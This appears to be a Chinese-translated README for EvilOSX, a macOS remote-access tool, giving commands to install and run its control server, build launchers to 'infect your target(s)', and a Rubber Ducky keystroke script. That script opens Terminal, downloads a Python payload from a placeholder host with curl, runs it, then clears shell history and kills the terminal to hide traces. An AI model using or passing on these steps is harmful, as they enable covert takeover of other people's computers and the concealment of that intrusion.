EvilOSX
1.0.0

塞德里克·欧文斯(Cedric Owens)的Marco Generator
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Go into the repository
$ cd EvilOSX
# Install dependencies required by the server
$ sudo pip install -r requirements.txt
# Start the GUI
$ python start.py
# Lastly, run a built launcher on your target(s)警告:由于创建有效载荷是针对目标系统独有的(由服务器自动),因此当任何机器人首次连接时,服务器必须运行。
对于那些想通过SSH使用它的人也有一个CLI:
# Create a launcher to infect your target(s)
$ python start.py --builder
# Start the CLI
$ python start.py --cli --port 1337
# Lastly, run a built launcher on your target(s) 该项目是与我的橡皮鸭一起使用的,这是一个简单的脚本:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
Evilosx将尽可能地根据语义版本指南维护。
服务器和机器人版本将使用以下格式编号:
<major>.<minor>.<patch>
并根据以下准则构建:
有关SEMVER的更多信息,请访问https://semver.org/。
随时在此处提交任何问题或功能请求。
有关如何创建模块的简单指南,请单击此处。
GPLV3